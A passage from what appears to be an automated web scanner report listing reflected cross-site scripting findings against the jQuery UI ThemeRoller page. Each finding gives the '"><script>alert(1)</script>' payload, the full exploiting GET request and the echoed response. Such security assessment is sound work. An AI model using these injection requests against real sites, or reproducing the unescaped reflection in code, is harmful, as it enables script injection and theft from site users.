adow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120034

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bg
...[SNIP]...

1.47. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525e3"><script>alert(1)</script>e1a9bff29ab was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png
...[SNIP]...

1.48. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f25"><script>alert(1)</script>177d857462b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacit
...[SNIP]...

1.49. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bbf"><script>alert(1)</script>65e5ab4225b was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&
...[SNIP]...

1.50. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb4f"><script>alert(1)</script>981f4e08c10 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.51. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f47"><script>alert(1)</script>50caeb8292e was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ns-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpa
...[SNIP]...

1.52. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50110"><script>alert(1)</script>fa031faa443 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=
...[SNIP]...

1.53. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7900c"><script>alert(1)</script>cae816e79ac was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpac
...[SNIP]...

1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94042"><script>alert(1)</script>2f54497d769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?94042"><script>alert(1)</script>2f54497d769=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:16:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&94042"><script>alert(1)</script>2f54497d769=1" type="text/css" media="all" />
...[SNIP]...

1.55. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e5e"><script>alert(1)</script>f8b31991ec3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.56. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49af1"><script>alert(1)</script>944ac9397d5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

